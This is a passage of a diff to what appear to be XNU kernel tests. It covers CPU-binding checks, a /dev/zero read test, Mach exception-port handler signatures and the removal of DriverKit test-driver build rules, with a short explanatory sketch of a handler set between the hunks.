+       T_LOG("hw.ncpu: %2d\n", sysctl_ncpu);
 
-       kern_return_t kr;
+       T_ASSERT_GT(sysctl_ncpu, 0, "at least one CPU exists");
 
-       kr = semaphore_wait_signal(g_go_sem, g_readysem);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal");
+       for (uint32_t cpu_to_bind = 0; cpu_to_bind < sysctl_ncpu; cpu_to_bind++) {
+               int32_t before_csw_count = get_csw_count();
+               T_LOG("(csw %4d) attempting to bind to cpu %2d\n", before_csw_count, cpu_to_bind);
 
-       uint64_t timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC * 2) + mach_absolute_time();
+               uint64_t start =  mach_absolute_time();
 
-       /*
-        * run and sleep a bit to force some scheduler churn to get all the cores active
-        * needed to work around bugs in the amp scheduler
-        */
-       while (mach_absolute_time() < timeout && g_bail == false) {
-               usleep(500);
+               rv = sysctlbyname("kern.sched_thread_bind_cpu", NULL, 0, &cpu_to_bind, sizeof(cpu_to_bind));
 
-               uint64_t inner_timeout = nanos_to_abs(1 * NSEC_PER_MSEC) + mach_absolute_time();
+               uint64_t end =  mach_absolute_time();
 
-               while (mach_absolute_time() < inner_timeout && g_bail == false) {
-                       ;
+               if (rv == -1 && errno == ENOTSUP) {
+                       T_SKIP("Binding is available, but this process doesn't support binding (e.g. Rosetta on Aruba)");
                }
-       }
 
-       kr = semaphore_wait_signal(g_go_sem, g_readysem);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal");
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.sched_thread_bind_cpu(%u)", cpu_to_bind);
 
-       return NULL;
-}
+               uint32_t os_cpu_number_reported = fixed_os_cpu_number();
 
+               bound_cpu_out = 0;
+               rv = sysctlbyname("kern.sched_thread_bind_cpu", &bound_cpu_out, &bound_cpu_out_size, NULL, 0);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "read kern.sched_thread_bind_cpu");
 
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wgnu-flexible-array-initializer"
-T_DECL(count_cpus, "Tests we can schedule threads on all hw.ncpus cores according to _os_cpu_number",
-    T_META_CHECK_LEAKS(false), T_META_ENABLED(false))
-#pragma clang diagnostic pop
-{
-       setvbuf(stdout, NULL, _IONBF, 0);
-       setvbuf(stderr, NULL, _IONBF, 0);
+               T_QUIET; T_EXPECT_EQ((int)cpu_to_bind, bound_cpu_out,
+                   "should report bound cpu id matching requested bind target");
 
-       int rv;
-       kern_return_t kr;
-       kr = mach_timebase_info(&timebase_info);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_timebase_info");
-
-       kr = semaphore_create(mach_task_self(), &g_readysem, SYNC_POLICY_FIFO, 0);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_create");
-
-       kr = semaphore_create(mach_task_self(), &g_go_sem, SYNC_POLICY_FIFO, 0);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_create");
-
-       size_t ncpu_size = sizeof(g_threads);
-       rv = sysctlbyname("hw.ncpu", &g_threads, &ncpu_size, NULL, 0);
-       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "sysctlbyname(hw.ncpu)");
-
-       printf("hw.ncpu: %2d\n", g_threads);
+               uint64_t delta_abs = end - start;
+               uint64_t delta_ns = abs_to_nanos(delta_abs);
 
-       assert(g_threads < max_threads);
+               int32_t after_csw_count = get_csw_count();
 
-       for (uint32_t i = 0; i < g_threads; i++) {
-               create_thread(&thread_fn, g_thread_pri);
-       }
-
-       for (uint32_t i = 0; i < g_spin_threads; i++) {
-               create_thread(&spin_fn, g_spin_threads_pri);
-       }
+               T_LOG("(csw %4d) bound to cpu %2d in %f milliseconds\n",
+                   after_csw_count, cpu_to_bind,
+                   ((double)delta_ns / 1000000.0));
 
-       for (uint32_t i = 0; i < g_threads + g_spin_threads; i++) {
-               kr = semaphore_wait(g_readysem);
-               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait");
-       }
+               if (cpu_to_bind > 0) {
+                       T_QUIET; T_EXPECT_LT(before_csw_count, after_csw_count,
+                           "should have had to context switch to execute the bind");
+               }
 
-       uint64_t timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC) + mach_absolute_time();
+               T_LOG("cpu %2d reported id %2d\n",
+                   cpu_to_bind, os_cpu_number_reported);
 
-       /* spin to warm up CLPC :) */
-       while (mach_absolute_time() < timeout) {
-               ;
+               T_QUIET;
+               T_EXPECT_EQ(cpu_to_bind, os_cpu_number_reported,
+                   "should report same CPU number as was bound to");
        }
 
-       kr = semaphore_signal_all(g_go_sem);
-       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_signal_all");
+       int unbind = -1; /* pass -1 in order to unbind the thread */
 
-       for (uint32_t i = 0; i < g_threads + g_spin_threads; i++) {
-               kr = semaphore_wait(g_readysem);
-               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait");
-       }
+       rv = sysctlbyname("kern.sched_thread_bind_cpu", NULL, 0, &unbind, sizeof(unbind));
 
-       uint32_t cpus_seen = 0;
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.sched_thread_bind_cpu(%u)", unbind);
 
-       for (uint32_t i = 0; i < g_threads; i++) {
-               if (g_cpu_seen[i]) {
-                       cpus_seen++;
-               }
+       rv = sysctlbyname("kern.sched_thread_bind_cpu", &bound_cpu_out, &bound_cpu_out_size, NULL, 0);
 
-               printf("cpu %2d: %d\n", i, g_cpu_seen[i]);
-       }
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "read kern.sched_thread_bind_cpu");
+       T_QUIET; T_ASSERT_EQ(bound_cpu_out, -1, "thread should be unbound at the end");
 
-       T_ASSERT_EQ(cpus_seen, g_threads, "test should have run threads on all CPUS");
+       T_PASS("test has run threads on all CPUS");
 }
index bb0411decd154ef6e604e8bff78c277f10ff4696..2688bdde440c28511ce2ca67cb24ddf10efc60ed 100644 (file)
@@ -1040,7 +1040,7 @@ apple_key_store(uint32_t command,
                input_struct_count, outputs, output_count, NULL, NULL
                );
        if (io_result != kIOReturnSuccess) {
-               T_LOG("%s: call to AppleKeyStore method %d failed", __func__);
+               T_LOG("%s: call to AppleKeyStore method %d failed", __func__, command);
                goto close;
        }
 
index 1e753f7f1d72b2e468cbff5226b01c5c0b587352..6005152eb5e5d00a07676f8261f3d7919ac14c41 100644 (file)
@@ -120,6 +120,8 @@ run_test(vm_address_t buffer_start, vm_address_t buffer_length)
 
 static size_t
 kern_memory_failure_handler(
+       __unused mach_port_t task,
+       __unused mach_port_t thread,
        exception_type_t exception,
        mach_exception_data_t code)
 {
diff --git a/tests/dev_zero.c b/tests/dev_zero.c
new file mode 100644 (file)
index 0000000..c355499
--- /dev/null
@@ -0,0 +1,29 @@
+#include <stdio.h>
+#include <fcntl.h>
+#include <util.h>
+#include <unistd.h>
+#include <darwintest.h>
+
+T_DECL(dev_zero,
+    "test reading from /dev/zero",
+    T_META_ASROOT(false))
+{
+       int dev = opendev("/dev/zero", O_RDONLY, NULL, NULL);
+       char buffer[100];
+
+       for (int i = 0; i < 100; i++) {
+               buffer[i] = 0xff;
+       }
+
+       int rd_sz = read(dev, buffer, sizeof(buffer));
+
+       T_EXPECT_EQ(rd_sz, 100, "read from /dev/zero failed");
+
+       for (int i = 0; i < 100; i++) {
+               if (buffer[i]) {
+                       T_FAIL("Unexpected non-zero character read from /dev/zero");
+               }
+       }
+
+       close(dev);
+}
index f58ffbd843cd9fddca2e994c19f799e384d4764e..987e08d5749005b35d15e379c32b8e5a933756b0 100644 (file)
-PROJECT := xnu/darwintests
-
 ifdef BASEDSTROOT
 override DSTROOT = $(BASEDSTROOT)
 endif
-INVALID_ARCHS = i386
-ENABLE_LTE_TESTS=YES
-
-OTHER_LTE_INCLUDE_FILES += \
-       /System/Library/PrivateFrameworks/LoggingSupport.framework, \
-       /System/Library/PrivateFrameworks/MobileKeyBag.framework, \
-       /System/Library/Frameworks/IOSurface.framework, \
-       /usr/local/lib/libdarwintest_utils.dylib, \
-       /usr/lib/libapple_crypto.dylib,
-
-DEVELOPER_DIR ?= $(shell xcode-select -p)
 
 # the xnu build system will only ever call us with the default target
 .DEFAULT_GOAL := install
 
-SDKROOT ?= driverkit.internal
-
-include $(DEVELOPER_DIR)/AppleInternal/Makefiles/darwintest/Makefile.common
-
-DRIVERKIT_DIR := $(TARGETSDK)/System/DriverKit
-DRIVERKIT_TARGET := x86_64-apple-driverkit$(shell xcrun --sdk driverkit.internal --show-sdk-version)
-
-IIG := $(shell xcrun --sdk "$(SDKROOT)" -f iig)
-
-# Enumerate all directories in this folder, excluding the "build" directory
-DEXT_SRCS = $(filter-out build,$(shell find . -type d -depth 1 | sed -e "s:./::g"))
-
-# hack: reuse the default CXXFLAGS and LDFLAGS but remove -mmacosx-version-min and -arch. Also adds a few other required flags
-# These are used for both iig and clang
-DEXT_SHARED_CXXFLAGS := $(filter-out -mmacosx-version-min=%, $(shell echo $(CXXFLAGS) $(OTHER_CXXFLAGS) | sed -e "s/-arch [a-zA-Z0-9_]*//g"))  -isystem$(DRIVERKIT_DIR)/usr/include -iframework$(DRIVERKIT_DIR)/System/Library/Frameworks -std=gnu++14
-
-# These are used just for clang
-DEXT_CXXFLAGS := $(DEXT_SHARED_CXXFLAGS) -target $(DRIVERKIT_TARGET)
-
-# These are used just for iig
-IIGFLAGS := -- $(DEXT_SHARED_CXXFLAGS) -D__IIG=1 -x c++
-
-# Used just for clang. LDFLAGS are not needed for iig
-DEXT_LDFLAGS := $(filter-out -mmacosx-version-min=%, $(shell echo $(LDFLAGS) $(OTHER_LDFLAGS) | sed -e "s/-arch [a-zA-Z0-9_]*//g")) -target $(DRIVERKIT_TARGET) -L$(DRIVERKIT_DIR)/usr/lib -F$(DRIVERKIT_DIR)/System/Library/Frameworks -framework DriverKit
+install:
+       mkdir -p $(DSTROOT)/AppleInternal
 
 
-# This generates rules to create dexts from each directory specified in DEXT_SRCS
-define GENERATE_DEXT_RULE
-## Given the following directory structure:
-##   test_driver_123/
-##     Info.plist
-##     test_driver_123.entitlements
-##     [cpp and iig files]
-## This produces a dext called com.apple.test_driver_123.dext:
-##   com.apple.test_driver_123.dext/
-##     com.apple.test_driver_123 [dext executable]
-##     Info.plist
-##     _CodeSignature/
-
-CUSTOM_TARGETS += com.apple.$1.dext
-
-com.apple.$1.dext : $(patsubst $1/%.cpp,$(OBJROOT)/$1/%.o,$(wildcard $1/*.cpp)) $(patsubst $1/%.iig,$(OBJROOT)/$1/DerivedSources/%.iig.o,$(wildcard $1/*.iig))
-       # Create bundle directory
-       mkdir -p $(SYMROOT)/$$@
-       # Link object files
-       $(CXX) $(DEXT_LDFLAGS) $$^ -o $(SYMROOT)/$$@/com.apple.$1
-       # Copy Info.plist and sign
-       cp $1/Info.plist $(SYMROOT)/$$@
-       codesign -vvv --force --sign - --entitlements $1/$1.entitlements --timestamp=none $(SYMROOT)/$$@
-
-install-com.apple.$1.dext: com.apple.$1.dext
-       mkdir -p $(INSTALLDIR)
-       cp -R $(SYMROOT)/com.apple.$1.dext $(INSTALLDIR)
-
-$(OBJROOT)/$1/DerivedSources/%.iig.o: $(OBJROOT)/$1/DerivedSources/%.iig.cpp
-       mkdir -p $(OBJROOT)/$1/DerivedSources
-       # Compile *.iig.cpp to object file
-       $(CXX) $(DEXT_CXXFLAGS) -I$1/ -I$(OBJROOT)/$1/DerivedSources -c $$^ -o $$@
-
-$(OBJROOT)/$1/DerivedSources/%.iig.cpp: $1/%.iig
-       mkdir -p $(OBJROOT)/$1/DerivedSources
-       # Generate *.iig.cpp and *.h header files from *.iig
-       $(IIG) --def $$^ --impl $$@ --header $$(patsubst %.iig.cpp,%.h,$$@) $(IIGFLAGS)
-
-# Tell make not to delete the intermediate *.iig.cpp file since it is useful for debugging
-.PRECIOUS :: $(OBJROOT)/$1/DerivedSources/%.iig.cpp
-
-$(OBJROOT)/$1/%.o: $1/%.cpp $(patsubst $1/%.iig,$(OBJROOT)/$1/DerivedSources/%.iig.o,$(wildcard $1/*.iig))
-       # Compile c++ file. The additional dependency is for headers emitted by iig
-       $(CXX) $(DEXT_CXXFLAGS) -I$1/ -I$(OBJROOT)/$1/DerivedSources -c $$< -o $$@
-endef
-
-
-ifeq ($(PLATFORM),MacOSX)
-$(foreach DEXTSRCDIR,$(DEXT_SRCS),$(eval $(call GENERATE_DEXT_RULE,$(DEXTSRCDIR))))
-else
-EXCLUDED_SOURCES += $(DEXT_SRCS)
-endif
-
-include $(DEVELOPER_DIR)/AppleInternal/Makefiles/darwintest/Makefile.targets
diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/Info.plist b/tests/driverkit/test_intentionally_crashing_driver_56101852/Info.plist
deleted file mode 100644 (file)
index d4a5346..0000000
+++ /dev/null
@@ -1,70 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-       <key>BuildMachineOSBuild</key>
-       <string>19A582a</string>
-       <key>CFBundleDevelopmentRegion</key>
-       <string>en</string>
-       <key>CFBundleExecutable</key>
-       <string>com.apple.test_intentionally_crashing_driver_56101852</string>
-       <key>CFBundleIdentifier</key>
-       <string>com.apple.test_intentionally_crashing_driver_56101852</string>
-       <key>CFBundleInfoDictionaryVersion</key>
-       <string>6.0</string>
-       <key>CFBundleName</key>
-       <string>com.apple.test_intentionally_crashing_driver_56101852</string>
-       <key>CFBundlePackageType</key>
-       <string>DEXT</string>
-       <key>CFBundleShortVersionString</key>
-       <string>1.0</string>
-       <key>CFBundleSupportedPlatforms</key>
-       <array>
-               <string>MacOSX</string>
-       </array>
-       <key>CFBundleVersion</key>
-       <string>1</string>
-       <key>DTCompiler</key>
-       <string>com.apple.compilers.llvm.clang.1_0</string>
-       <key>DTPlatformBuild</key>
-       <string>12A5026a</string>
-       <key>DTPlatformName</key>
-       <string>macosx</string>
-       <key>DTPlatformVersion</key>
-       <string>10.16</string>
-       <key>DTSDKBuild</key>
-       <string></string>
-       <key>DTSDKName</key>
-       <string>driverkit.macosx20.0</string>
-       <key>DTXcode</key>
-       <string>1200</string>
-       <key>DTXcodeBuild</key>
-       <string>12A5026a</string>
-       <key>IOKitPersonalities</key>
-       <dict>
-               <key>test_intentionally_crashing_driver_56101852</key>
-               <dict>
-                       <key>CFBundleIdentifier</key>
-                       <string>com.apple.test_intentionally_crashing_driver_56101852</string>
-                       <key>CFBundleIdentifierKernel</key>
-                       <string>com.apple.kpi.iokit</string>
-                       <key>IOClass</key>
-                       <string>IOUserService</string>
-                       <key>IOMatchCategory</key>
-                       <string>com.apple.test_intentionally_crashing_driver_56101852</string>
-                       <key>IOProviderClass</key>
-                       <string>IOUserResources</string>
-                       <key>IOResourceMatch</key>
-                       <string>IOKit</string>
-                       <key>IOUserClass</key>
-                       <string>test_intentionally_crashing_driver_56101852</string>
-                       <key>IOUserServerName</key>
-                       <string>com.apple.test_intentionally_crashing_driver_56101852</string>
-               </dict>
-       </dict>
-       <key>OSBundleUsageDescription</key>
-       <string></string>
-       <key>OSMinimumDriverKitVersion</key>
-       <string>20.0</string>
-</dict>
-</plist>
diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.cpp b/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.cpp
deleted file mode 100644 (file)
index 96e21dc..0000000
+++ /dev/null
@@ -1,30 +0,0 @@
-//
-//  test_intentionally_crashing_driver_56101852.cpp
-//  test_intentionally_crashing_driver_56101852
-//
-//  Copyright © 2019 Apple Inc. All rights reserved.
-//
-
-#include <os/log.h>
-
-#include <DriverKit/IOUserServer.h>
-#include <DriverKit/IOLib.h>
-
-#include "test_intentionally_crashing_driver_56101852.h"
-
-kern_return_t
-IMPL(test_intentionally_crashing_driver_56101852, Start)
-{
-       kern_return_t ret;
-       ret = Start(provider, SUPERDISPATCH);
-       os_log(OS_LOG_DEFAULT, "Hello World");
-       return ret;
-}
-
-/* Intentionally crash */
-__attribute__((constructor)) void
-crash()
-{
-       /* cause SIGILL */
-       __builtin_trap();
-}
diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.entitlements b/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.entitlements
deleted file mode 100644 (file)
index a34733c..0000000
+++ /dev/null
@@ -1,10 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-       <key>com.apple.developer.driverkit</key>
-       <true/>
-       <key>com.apple.security.app-sandbox</key>
-       <true/>
-</dict>
-</plist>
diff --git a/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.iig b/tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.iig
deleted file mode 100644 (file)
index 1ebf4fb..0000000
+++ /dev/null
@@ -1,21 +0,0 @@
-//
-//  test_intentionally_crashing_driver_56101852.iig
-//  test_intentionally_crashing_driver_56101852
-//
-//  Copyright © 2019 Apple Inc. All rights reserved.
-//
-
-#ifndef test_intentionally_crashing_driver_56101852_h
-#define test_intentionally_crashing_driver_56101852_h
-
-#include <Availability.h>
-#include <DriverKit/IOService.iig>
-
-class test_intentionally_crashing_driver_56101852: public IOService
-{
-public:
-    virtual kern_return_t
-    Start(IOService * provider) override;
-};
-
-#endif /* test_intentionally_crashing_driver_56101852_h */
index 13d4681afd3a4f819a34c7c90c6f3bb32407063f..f91df015f827ec31b8123ba99be3f94b6c886220 100644 (file)
@@ -14,6 +14,8 @@
 #include <uuid/uuid.h>
 #endif
 
+#include "drop_priv.h"
+
 #if TARGET_OS_OSX
 #define INVOKER_UID "SUDO_UID"
 #define INVOKER_GID "SUDO_GID"
@@ -40,8 +42,6 @@ _get_sudo_invoker(const char *var)
 }
 #endif /* TARGET_OS_OSX */
 
-void
-drop_priv(void);
 void
 drop_priv(void)
 {
diff --git a/tests/drop_priv.h b/tests/drop_priv.h
new file mode 100644 (file)
index 0000000..864da83
--- /dev/null
@@ -0,0 +1,6 @@
+#ifndef __DROP_PRIV_H
+#define __DROP_PRIV_H
+
+void drop_priv(void);
+
+#endif /* __DROP_PRIV_H */
index 6084fef4b0c322e62f9fc54e1449064ec5b695bb..83567dcf1d2f270b7143a39013425b9677026f47 100644 (file)
@@ -105,14 +105,36 @@ catch_mach_exception_raise(
        __builtin_unreachable();
 }
 
+/**
+ * This has to be defined for linking purposes, but it's unused.
+ */
+kern_return_t
+catch_mach_exception_raise_state(
+       mach_port_t exception_port,
+       exception_type_t type,
+       exception_data_t codes,
+       mach_msg_type_number_t code_count,
+       int *flavor,
+       thread_state_t in_state,
+       mach_msg_type_number_t in_state_count,
+       thread_state_t out_state,
+       mach_msg_type_number_t *out_state_count)
+{
+#pragma unused(exception_port, type, codes, code_count, flavor, in_state, in_state_count, out_state, out_state_count)
+       T_FAIL("Triggered catch_mach_exception_raise_state() which shouldn't happen...");
+       __builtin_unreachable();
+}
+
 /**
  * Called by mach_exc_server() to handle the exception. This will call the
  * test's exception-handler callback and will then modify
  * the thread state to move to the next instruction.
  */
 kern_return_t
-catch_mach_exception_raise_state(
+catch_mach_exception_raise_state_identity(
        mach_port_t exception_port __unused,
+       mach_port_t thread,
+       mach_port_t task,
        exception_type_t type,
        exception_data_t codes,
        mach_msg_type_number_t code_count,
@@ -138,7 +160,7 @@ catch_mach_exception_raise_state(
        T_ASSERT_EQ(*flavor, EXCEPTION_THREAD_STATE, "The thread state flavor is EXCEPTION_THREAD_STATE");
        T_ASSERT_EQ(in_state_count, EXCEPTION_THREAD_STATE_COUNT, "The thread state count is EXCEPTION_THREAD_STATE_COUNT");
 
-       size_t advance_pc = exc_handler_callback(type, codes_64);
+       size_t advance_pc = exc_handler_callback(task, thread, type, codes_64);
 
        /**
         * Increment the PC by the requested amount so the thread doesn't cause
@@ -155,6 +177,7 @@ catch_mach_exception_raise_state(
        pc = ptrauth_sign_unauthenticated(pc, ptrauth_key_function_pointer, 0);
        arm_thread_state64_set_pc_fptr(*state, pc);
 #else
+       (void)advance_pc;
        T_FAIL("catch_mach_exception_raise_state() not fully implemented on this architecture");
        __builtin_unreachable();
 #endif
@@ -163,28 +186,6 @@ catch_mach_exception_raise_state(
        return KERN_SUCCESS;
 }
 
-/**
- * This has to be defined for linking purposes, but it's unused.
- */
-kern_return_t
-catch_mach_exception_raise_state_identity(
-       mach_port_t exception_port,
-       mach_port_t thread,
-       mach_port_t task,
-       exception_type_t type,
-       exception_data_t codes,
-       mach_msg_type_number_t code_count,
-       int *flavor,
-       thread_state_t in_state,
-       mach_msg_type_number_t in_state_count,
-       thread_state_t out_state,
-       mach_msg_type_number_t *out_state_count)
-{
-#pragma unused(exception_port, thread, task, type, codes, code_count, flavor, in_state, in_state_count, out_state, out_state_count)
-       T_FAIL("Triggered catch_mach_exception_raise_state_identity() which shouldn't happen...");
-       __builtin_unreachable();
-}
-
 mach_port_t
 create_exception_port(exception_mask_t exception_mask)
 {
@@ -209,7 +210,7 @@ create_exception_port(exception_mask_t exception_mask)
                thread,
                exception_mask,
                exc_port,
-               (exception_behavior_t)(EXCEPTION_STATE | MACH_EXCEPTION_CODES),
+               (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES),
                EXCEPTION_THREAD_STATE);
        T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler");
 
index 2ac27c8adb5a05a69c7cf583a9ac9a6b430080e6..60237d5da68533798f0b14d2cf09d6d026ba855c 100644 (file)
  * Callback invoked by run_exception_handler() when a Mach exception is
  * received.
  *
- * @param type  exception type received from the kernel
- * @param codes exception codes received from the kernel
+ * @param task      the task causing the exception
+ * @param thread    the thread causing the exception
+ * @param type      exception type received from the kernel
+ * @param codes     exception codes received from the kernel
  *
  * @return      how much the exception handler should advance the program
  *              counter, in bytes (in order to move past the code causing the
  *              exception)
  */
-typedef size_t (*exc_handler_callback_t)(exception_type_t type, mach_exception_data_t codes);
+typedef size_t (*exc_handler_callback_t)(mach_port_t task, mach_port_t thread,
+    exception_type_t type, mach_exception_data_t codes);
 
 mach_port_t
 create_exception_port(exception_mask_t exception_mask);
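
The hunk above widens exc_handler_callback_t so handlers also receive the faulting task and thread ports in addition to the exception type and codes. A minimal sketch of a handler matching the new signature, using the darwintest macros seen elsewhere in these tests (the handler name, the EXC_BAD_ACCESS check, and the 4-byte PC advance are illustrative assumptions, not taken from this commit):

/* Hypothetical handler matching the new exc_handler_callback_t signature. */
static size_t
example_exc_handler(
	mach_port_t task,               /* task that raised the exception */
	mach_port_t thread,             /* thread that raised the exception */
	exception_type_t type,
	mach_exception_data_t codes)
{
	T_EXPECT_EQ(task, mach_task_self(), "exception came from this task");
	T_EXPECT_EQ(type, EXC_BAD_ACCESS, "expected EXC_BAD_ACCESS");
	T_LOG("thread 0x%x faulted, codes[0] = 0x%llx", thread, (unsigned long long)codes[0]);
	return 4; /* advance the PC past a 4-byte faulting instruction */
}

Such a handler would be registered the same way as before: create_exception_port(EXC_MASK_BAD_ACCESS) followed by run_exception_handler(exc_port, example_exc_handler).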
diff --git a/tests/exception_ports_info.c b/tests/exception_ports_info.c
new file mode 100644 (file)
index 0000000..e27ba56
--- /dev/null
@@ -0,0 +1,178 @@
+#include <darwintest.h>
+#include <mach/mach.h>
+#include <mach/mach_types.h>
+#include <mach/task.h>
+#include <mach/thread_act.h>
+#include <mach_debug/ipc_info.h>
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.ipc"),
+       T_META_RUN_CONCURRENTLY(true));
+
+T_DECL(exception_ports_info, "Test {task, thread}_get_exception_ports_info")
+{
+       kern_return_t kr;
+       mach_port_t exc_port1, exc_port2, exc_port3;
+
+       mach_msg_type_number_t count = EXC_TYPES_COUNT;
+       exception_mask_t masks[EXC_TYPES_COUNT];
+       ipc_info_port_t ports_info[EXC_TYPES_COUNT];
+       exception_behavior_t behaviors[EXC_TYPES_COUNT];
+       thread_state_flavor_t flavors[EXC_TYPES_COUNT];
+
+       mach_msg_type_number_t count2 = EXC_TYPES_COUNT;
+       exception_mask_t masks2[EXC_TYPES_COUNT];
+       mach_port_t ports[EXC_TYPES_COUNT];
+       exception_behavior_t behaviors2[EXC_TYPES_COUNT];
+       thread_state_flavor_t flavors2[EXC_TYPES_COUNT];
+
+       unsigned int exc_port1_kotype = 0, exc_port1_kaddr = 0;
+       unsigned int exc_port2_kotype = 0, exc_port2_kaddr = 0;
+       unsigned int kotype = 0, kobject = 0, exc_port3_kotype = 0, exc_port3_kaddr = 0;
+       boolean_t found_exc_port1 = false;
+       boolean_t found_exc_port2 = false;
+       boolean_t found_exc_port3 = false;
+
+       ipc_info_space_t info_space;
+       ipc_info_name_array_t table;
+       ipc_info_tree_name_array_t tree;
+       mach_msg_type_number_t tblcnt = 0, treecnt = 0;
+
+       /* Create the mach port the exception messages will be sent to. */
+       kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &exc_port1);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Allocated mach exception port");
+       kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &exc_port2);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Allocated mach exception port");
+       kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &exc_port3);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Allocated mach exception port");
+
+       /*
+        * Insert a send right into the exception port that the kernel will use to
+        * send the exception thread the exception messages.
+        */
+       kr = mach_port_insert_right(mach_task_self(), exc_port1, exc_port1, MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Inserted a SEND right into the exception port");
+       kr = mach_port_insert_right(mach_task_self(), exc_port2, exc_port2, MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Inserted a SEND right into the exception port");
+       kr = mach_port_insert_right(mach_task_self(), exc_port3, exc_port3, MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Inserted a SEND right into the exception port");
+
+       T_LOG("exc_port1: 0x%x", exc_port1);
+       T_LOG("exc_port2: 0x%x", exc_port2);
+       T_LOG("exc_port3: 0x%x", exc_port3);
+
+       /* Tell the kernel what port to send exceptions to. */
+       kr = task_set_exception_ports(
+               mach_task_self(),
+               EXC_MASK_GUARD,
+               exc_port1,
+               (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES),
+               THREAD_STATE_NONE);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler");
+
+       kr = task_set_exception_ports(
+               mach_task_self(),
+               EXC_MASK_RPC_ALERT,  /* why can't this be EXC_CRASH or EXC_MASK_CORPSE_NOTIFY? */
+               exc_port2,
+               (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES),
+               THREAD_STATE_NONE);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler");
+
+       kr = task_set_exception_ports(
+               mach_task_self(),
+               EXC_MASK_RESOURCE | EXC_MASK_BREAKPOINT | EXC_MASK_SYSCALL,
+               exc_port3,
+               (exception_behavior_t)(EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES),
+               THREAD_STATE_NONE);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "Set the exception port to my custom handler");
+
+       /* now, get exception ports info */
+       kr = thread_get_exception_ports(mach_thread_self(), EXC_MASK_ALL, masks2, &count2, ports, behaviors2, flavors2);
+       T_EXPECT_MACH_SUCCESS(kr, "thread_get_exception_ports(): 0x%x", kr);
+       T_EXPECT_EQ(count2, 0, "should have 0 exception ports");
+
+       kr = thread_get_exception_ports_info(mach_thread_self(), EXC_MASK_ALL, masks, &count, ports_info, behaviors, flavors);
+       T_EXPECT_MACH_SUCCESS(kr, "thread_get_exception_ports_info(): 0x%x", kr);
+       T_EXPECT_EQ(count, 0, "should have 0 exception ports");
+
+       count = EXC_TYPES_COUNT;
+       count2 = EXC_TYPES_COUNT;
+
+       kr = task_get_exception_ports_info(mach_task_self(), EXC_MASK_ALL, masks, &count, ports_info, behaviors, flavors);
+       T_EXPECT_MACH_SUCCESS(kr, "task_get_exception_ports_info(): 0x%x", kr);
+       T_EXPECT_EQ(count, 4, "should have 4 masks"); /* Returns 3 if one exc_port registers for EXC_CRASH */
+
+       /* get exception ports */
+       kr = task_get_exception_ports(mach_task_self(), EXC_MASK_ALL, masks2, &count2, ports, behaviors2, flavors2);
+       T_EXPECT_MACH_SUCCESS(kr, "task_get_exception_ports(): 0x%x", kr);
+
+       for (int i = 0; i < count2; i++) {
+               T_LOG("exception port name: 0x%x", ports[i]);
+       }
+       T_EXPECT_EQ(count, count2, "should return same mask count");
+
+       kr = memcmp(masks, masks2, count * sizeof(exception_mask_t));
+       T_EXPECT_EQ(kr, 0, "masks should be the same");
+
+       kr = memcmp(behaviors, behaviors2, count * sizeof(exception_behavior_t));
+       T_EXPECT_EQ(kr, 0, "behaviors should be the same");
+
+       kr = memcmp(flavors, flavors2, count * sizeof(thread_state_flavor_t));
